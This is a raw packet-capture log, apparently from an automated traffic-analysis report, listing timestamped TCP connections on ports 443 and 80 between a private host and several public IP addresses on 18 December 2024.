                                                                                        Dec 18, 2024 02:10:06.564712048 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.564721107 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.565331936 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.565445900 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.565495968 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.565529108 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.565577030 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.566030025 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.566078901 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.566086054 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.566777945 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.567559004 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.567611933 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.567620993 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.568028927 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.568079948 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.568088055 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.568854094 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.568912983 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.568928957 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.570631981 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.570678949 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.570688009 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.577711105 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.577769995 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.577779055 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.578659058 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.578733921 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.578746080 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.581309080 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.581365108 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.581372976 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.584935904 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.584989071 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.585001945 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.585442066 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.585514069 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.585525990 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.588475943 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.588525057 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.588531971 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.591567039 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.591639042 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.591650963 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.592396021 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.592458963 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.592466116 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.595850945 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.595907927 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.595913887 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.598072052 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.598139048 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.598150015 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.600964069 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.601027012 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.601033926 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.604501963 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.604561090 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.604568005 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.605318069 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.605402946 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.605413914 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.608141899 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.608225107 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.608231068 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.611165047 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.611236095 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.611246109 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.611845970 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.611902952 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.611908913 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.615005016 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.615070105 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.615076065 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.617664099 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.617755890 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.617767096 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.618444920 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.618503094 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.618510008 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.624144077 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.624218941 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.624229908 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.625077009 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.625135899 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.625142097 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.628518105 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.628572941 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.628582001 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.630631924 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.630700111 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.630712032 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.631884098 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.631947041 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.631953001 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.634100914 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.634166002 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.634176970 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.634747028 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.634807110 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.634813070 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.637326956 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.637394905 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.637402058 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.637963057 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.638030052 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.638041019 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.639863014 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.639915943 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.639923096 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.642349005 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.642405033 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.642410994 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.643522024 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.643585920 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.643600941 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.643840075 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.643892050 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.643903017 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.644056082 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.644115925 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.644143105 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.644185066 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.644215107 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.647166967 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.647219896 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.647228003 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.649604082 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.649662971 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.649668932 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.651968956 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.652033091 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.652041912 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.654383898 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.654438019 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.654443026 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.656696081 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.656754017 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.656759024 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.658982038 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.659038067 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.659043074 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.661252022 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.661299944 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.661314964 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.665555000 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.665606022 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.665611982 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.667692900 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.667745113 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.667749882 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.669869900 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.669931889 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.669938087 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.672017097 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.672070980 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.672076941 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.677109003 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.677136898 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.677164078 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.677170992 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.677227020 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.677759886 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.679621935 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.679675102 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.679681063 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.684698105 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.684752941 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.684758902 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.688319921 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.688386917 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.688393116 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.694017887 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.694091082 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.694097996 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.695502043 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.695557117 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.695564032 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.696194887 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.696274042 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.696280003 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.696882963 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.696933985 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.696939945 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.697880983 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.697935104 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.697941065 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.698484898 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.698537111 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.698543072 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.699857950 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.699919939 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.699925900 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.701775074 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.701833010 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.701838017 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.703527927 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.703582048 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.703587055 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.705190897 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.705249071 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.705255032 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.708462954 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.708511114 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.708517075 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.710237980 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.710350037 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.710355997 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.711807013 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.711879969 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.711886883 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.712177038 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.712234974 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.712404966 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.712424040 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.787787914 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:06.787826061 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.787915945 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:06.788129091 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:06.788136959 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:07.066605091 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:07.066662073 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:07.066751003 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:07.066961050 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:07.066973925 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.493479013 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.493758917 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.493782043 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.494122028 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.494179010 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.494802952 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.494854927 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.495003939 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.495075941 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.495146036 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.495152950 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.544904947 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:08.942154884 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:08.965121031 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.966685057 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:08.966706991 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.967339993 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.967365980 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.967453003 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:08.967453003 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:08.967461109 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.967817068 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:08.968398094 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.969521046 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:08.969599962 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:08.969731092 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.015331984 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.022559881 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.022567987 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.069921970 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.179445028 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.179569960 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.179666042 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.179682016 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.187417030 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.187689066 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.187700033 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.203129053 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.203309059 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.203330040 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.209837914 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.209980965 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.209995031 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.224183083 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.224288940 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.224298954 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.275913954 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.275916100 CET49678443192.168.2.1620.189.173.10
                                                                                        Dec 18, 2024 02:10:09.275933027 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.298942089 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.299335957 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.299343109 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.340207100 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.340213060 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.375242949 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.375446081 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.375453949 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.382627010 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.382973909 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.382980108 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.395056963 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.395204067 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.395210981 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.415505886 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.415743113 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.415750027 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.423746109 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.423882961 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.423892021 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.426673889 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.427104950 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.427113056 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.460072041 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.460141897 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.460150003 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.468436003 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.469116926 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.469124079 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.481383085 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.481574059 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.481580973 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.482319117 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.482424974 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.482430935 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.492305040 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.492408991 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.492415905 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.504388094 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.504555941 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.504563093 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.516738892 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.517049074 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.517056942 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.555007935 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.555114031 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.555124044 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.562777042 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.562953949 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.562959909 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.570919991 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.571048021 CET49716443192.168.2.16142.250.181.14
